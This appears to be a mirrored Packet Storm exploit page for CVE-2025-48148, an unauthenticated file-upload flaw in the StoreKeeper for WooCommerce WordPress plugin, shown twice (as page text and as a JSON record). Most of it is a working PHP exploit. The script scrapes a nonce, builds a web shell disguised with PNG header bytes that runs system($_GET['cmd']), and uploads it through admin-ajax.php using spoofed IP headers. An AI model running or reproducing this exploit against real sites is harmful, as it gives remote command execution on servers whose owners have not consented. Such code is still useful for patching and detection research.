📄 WordPress StoreKeeper for WooCommerce 14.4.4 Shell Upload_PACKETSTORM:215101

10 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

A critical security vulnerability exists in the StoreKeeper for WooCommerce WordPress plugin that allows unauthenticated attackers to upload arbitrary files, including PHP web shells, leading to complete system compromise. Version 14.4.4 is affected...

Visit Original Source

Basic Information

ID PACKETSTORM:215101

Published Feb 6, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : WordPress StoreKeeper for WooCommerce 14.4.4 Remote Code Execution via File Upload |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/storekeeper-for-woocommerce/ |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/210872/ & CVE-2025-48148

[+] Summary : A critical security vulnerability exists in the StoreKeeper for WooCommerce WordPress plugin that allows unauthenticated attackers to upload arbitrary files, including PHP web shells, leading to complete system compromise.

[+] Risk Assessment :

- **Attack Vector**: Network-based, no authentication required
- **Attack Complexity**: Low
- **Privileges Required**: None
- **User Interaction**: None

The vulnerability stems from improper nonce validation and missing authorization checks in the `upload_product_image` AJAX handler.

[+] Usage:

Usage: php poc.php -u <url> [--debug]

Example: php poc.php -u http://site.com/ [--debug]

[+] POC :

<?php

class NxploitedShellUploader {
private $logger;
private $timeout = 10;

public function __construct($debug = false) {
$this->setupLogger($debug);
}

private function setupLogger($debug) {
$this->logger = function($message, $level = 'INFO') {
$timestamp = date('Y-m-d H:i:s');
echo "[$timestamp] [$level] $message\n";
};
}

private function log($message, $level = 'INFO') {
call_user_func($this->logger, $message, $level);
}

public function getNonce($site_url) {
$headers = [
"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
"Accept: */*",
"Connection: close",
"Referer: " . $site_url,
"X-Forwarded-For: 127.0.0.1",
"X-Originating-IP: 127.0.0.1",
"X-Remote-IP: 127.0.0.1",
"X-Remote-Addr: 127.0.0.1"
];

$this->log("Requesting site for nonce extraction...");

$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $site_url,
CURLOPT_HTTPHEADER => $headers,
CURLOPT_TIMEOUT => $this->timeout,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_RETURNTRANSFER => true
]);

$response = curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);

if ($error) {
$this->log("Error fetching URL: $error", 'ERROR');
exit(1);
}

if (preg_match('/"nonce":"([a-f0-9]+)"/', $response, $matches)) {
$nonce_val = $matches[1];
$this->log("Nonce extracted: $nonce_val");
return $nonce_val;
}

$this->log("Nonce not found!", 'ERROR');
exit(1);
}

public function writeShell($filename = "indoushka.php") {
$shell_content = "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A<?php system(\$_GET['cmd']); ?>";

if (file_put_contents($filename, $shell_content) !== false) {
$this->log("Shell file created: $filename");
return true;
} else {
$this->log("Failed to create shell file: $filename", 'ERROR');
return false;
}
}

public function uploadShell($site_url, $nonce, $shell_path) {
$base = rtrim(explode('/wp-admin/', $site_url)[0], '/');
$ajax_url = $base . "/wp-admin/admin-ajax.php";

$this->log("Uploading shell to $ajax_url ...");

if (!file_exists($shell_path)) {
$this->log("Shell file not found: $shell_path", 'ERROR');
exit(1);
}

$post_data = [
'action' => 'upload_product_image',
'nonce' => $nonce,
'file' => new CURLFile($shell_path, 'image/png', 'indoushka.php')
];

$headers = [
"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0",
"Referer: " . $site_url,
"X-Requested-With: XMLHttpRequest",
"Accept: */*",
"Connection: close",
"X-Forwarded-For: 127.0.0.1",
"X-Originating-IP: 127.0.0.1",
"X-Remote-IP: 127.0.0.1",
"X-Remote-Addr: 127.0.0.1",
"Pragma: no-cache",
"Cache-Control: no-cache"
];

$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $ajax_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $post_data,
CURLOPT_HTTPHEADER => $headers,
CURLOPT_TIMEOUT => 15,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_RETURNTRANSFER => true
]);

$response = curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);

if ($error) {
$this->log("Upload failed: $error", 'ERROR');
exit(1);
}

$this->log("Upload response:");
echo $response . "\n";

return $response;
}

public function execute($url, $debug = false) {
if ($debug) {
$this->log("Debug logging enabled", 'DEBUG');
}

try {
$nonce = $this->getNonce($url);
$this->writeShell("indoushka.php");
$this->uploadShell($url, $nonce, "indoushka.php");
$this->log("Operation completed.");
} catch (Exception $e) {
$this->log("Operation failed: " . $e->getMessage(), 'ERROR');
exit(1);
}
}
}

if (php_sapi_name() === 'cli') {
$options = getopt("u:", ["url:", "debug"]);

$url = $options['u'] ?? $options['url'] ?? null;
$debug = isset($options['debug']);

if (!$url) {
echo "Usage: php exploit.php -u <url> [--debug]\n";
echo "Example: php exploit.php -u http://site.com/ [--debug]\n";
exit(1);
}

$uploader = new NxploitedShellUploader($debug);
$uploader->execute($url, $debug);
} else {
echo "This script is intended for command line use only.\n";
}

if (function_exists('curl_version')) {

}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-06T18:44:21",
    "description": "A critical security vulnerability exists in the StoreKeeper for WooCommerce WordPress plugin that allows unauthenticated attackers to upload arbitrary files, including PHP web shells, leading to complete system compromise. Version 14.4.4 is affected...",
    "published": "2026-02-06T00:00:00",
    "modified": "2026-02-06T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 WordPress StoreKeeper for WooCommerce 14.4.4 Shell Upload",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215101",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-48148"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : WordPress StoreKeeper for WooCommerce 14.4.4 Remote Code Execution via File Upload                                          |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://wordpress.org/plugins/storekeeper-for-woocommerce/                                                                  |\n    =============================================================================================================================================\n    \n    POC : \n    \n    [+] References : https://packetstorm.news/files/id/210872/ & \tCVE-2025-48148 \n    \n    [+] Summary    : A critical security vulnerability exists in the StoreKeeper for WooCommerce WordPress plugin that allows unauthenticated attackers to upload arbitrary files, including PHP web shells, leading to complete system compromise.\n    \n    [+]  Risk Assessment :\n    \n    - **Attack Vector**: Network-based, no authentication required\n    - **Attack Complexity**: Low\n    - **Privileges Required**: None\n    - **User Interaction**: None\n    \n    The vulnerability stems from improper nonce validation and missing authorization checks in the `upload_product_image` AJAX handler.\n    \n    [+] Usage: \n    \n    Usage: php poc.php -u <url> [--debug]\n    \n    Example: php poc.php -u http://site.com/ [--debug]\n    \n    [+] POC :\n    \n    <?php\n    \n    class NxploitedShellUploader {\n        private $logger;\n        private $timeout = 10;\n        \n        public function __construct($debug = false) {\n            $this->setupLogger($debug);\n        }\n        \n        private function setupLogger($debug) {\n            $this->logger = function($message, $level = 'INFO') {\n                $timestamp = date('Y-m-d H:i:s');\n                echo \"[$timestamp] [$level] $message\\n\";\n            };\n        }\n        \n        private function log($message, $level = 'INFO') {\n            call_user_func($this->logger, $message, $level);\n        }\n        \n        public function getNonce($site_url) {\n            $headers = [\n                \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\n                \"Accept: */*\",\n                \"Connection: close\",\n                \"Referer: \" . $site_url,\n                \"X-Forwarded-For: 127.0.0.1\",\n                \"X-Originating-IP: 127.0.0.1\",\n                \"X-Remote-IP: 127.0.0.1\",\n                \"X-Remote-Addr: 127.0.0.1\"\n            ];\n            \n            $this->log(\"Requesting site for nonce extraction...\");\n            \n            $ch = curl_init();\n            curl_setopt_array($ch, [\n                CURLOPT_URL => $site_url,\n                CURLOPT_HTTPHEADER => $headers,\n                CURLOPT_TIMEOUT => $this->timeout,\n                CURLOPT_FOLLOWLOCATION => true,\n                CURLOPT_SSL_VERIFYPEER => false,\n                CURLOPT_SSL_VERIFYHOST => false,\n                CURLOPT_RETURNTRANSFER => true\n            ]);\n            \n            $response = curl_exec($ch);\n            $error = curl_error($ch);\n            curl_close($ch);\n            \n            if ($error) {\n                $this->log(\"Error fetching URL: $error\", 'ERROR');\n                exit(1);\n            }\n            \n            if (preg_match('/\"nonce\":\"([a-f0-9]+)\"/', $response, $matches)) {\n                $nonce_val = $matches[1];\n                $this->log(\"Nonce extracted: $nonce_val\");\n                return $nonce_val;\n            }\n            \n            $this->log(\"Nonce not found!\", 'ERROR');\n            exit(1);\n        }\n        \n        public function writeShell($filename = \"indoushka.php\") {\n            $shell_content = \"\\x89\\x50\\x4E\\x47\\x0D\\x0A\\x1A\\x0A<?php system(\\$_GET['cmd']); ?>\";\n            \n            if (file_put_contents($filename, $shell_content) !== false) {\n                $this->log(\"Shell file created: $filename\");\n                return true;\n            } else {\n                $this->log(\"Failed to create shell file: $filename\", 'ERROR');\n                return false;\n            }\n        }\n        \n        public function uploadShell($site_url, $nonce, $shell_path) {\n            $base = rtrim(explode('/wp-admin/', $site_url)[0], '/');\n            $ajax_url = $base . \"/wp-admin/admin-ajax.php\";\n            \n            $this->log(\"Uploading shell to $ajax_url ...\");\n            \n            if (!file_exists($shell_path)) {\n                $this->log(\"Shell file not found: $shell_path\", 'ERROR');\n                exit(1);\n            }\n            \n            $post_data = [\n                'action' => 'upload_product_image',\n                'nonce' => $nonce,\n                'file' => new CURLFile($shell_path, 'image/png', 'indoushka.php')\n            ];\n            \n            $headers = [\n                \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\",\n                \"Referer: \" . $site_url,\n                \"X-Requested-With: XMLHttpRequest\",\n                \"Accept: */*\",\n                \"Connection: close\",\n                \"X-Forwarded-For: 127.0.0.1\",\n                \"X-Originating-IP: 127.0.0.1\",\n                \"X-Remote-IP: 127.0.0.1\",\n                \"X-Remote-Addr: 127.0.0.1\",\n                \"Pragma: no-cache\",\n                \"Cache-Control: no-cache\"\n            ];\n            \n            $ch = curl_init();\n            curl_setopt_array($ch, [\n                CURLOPT_URL => $ajax_url,\n                CURLOPT_POST => true,\n                CURLOPT_POSTFIELDS => $post_data,\n                CURLOPT_HTTPHEADER => $headers,\n                CURLOPT_TIMEOUT => 15,\n                CURLOPT_FOLLOWLOCATION => true,\n                CURLOPT_SSL_VERIFYPEER => false,\n                CURLOPT_SSL_VERIFYHOST => false,\n                CURLOPT_RETURNTRANSFER => true\n            ]);\n            \n            $response = curl_exec($ch);\n            $error = curl_error($ch);\n            curl_close($ch);\n            \n            if ($error) {\n                $this->log(\"Upload failed: $error\", 'ERROR');\n                exit(1);\n            }\n            \n            $this->log(\"Upload response:\");\n            echo $response . \"\\n\";\n            \n            return $response;\n        }\n        \n        public function execute($url, $debug = false) {\n            if ($debug) {\n                $this->log(\"Debug logging enabled\", 'DEBUG');\n            }\n            \n            try {\n                $nonce = $this->getNonce($url);\n                $this->writeShell(\"indoushka.php\");\n                $this->uploadShell($url, $nonce, \"indoushka.php\");\n                $this->log(\"Operation completed.\");\n            } catch (Exception $e) {\n                $this->log(\"Operation failed: \" . $e->getMessage(), 'ERROR');\n                exit(1);\n            }\n        }\n    }\n    \n    if (php_sapi_name() === 'cli') {\n        $options = getopt(\"u:\", [\"url:\", \"debug\"]);\n        \n        $url = $options['u'] ?? $options['url'] ?? null;\n        $debug = isset($options['debug']);\n        \n        if (!$url) {\n            echo \"Usage: php exploit.php -u <url> [--debug]\\n\";\n            echo \"Example: php exploit.php -u http://site.com/ [--debug]\\n\";\n            exit(1);\n        }\n        \n        $uploader = new NxploitedShellUploader($debug);\n        $uploader->execute($url, $debug);\n    } else {\n        echo \"This script is intended for command line use only.\\n\";\n    }\n    \n    if (function_exists('curl_version')) {\n     \n    }\n    ?>\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215101",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215101/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply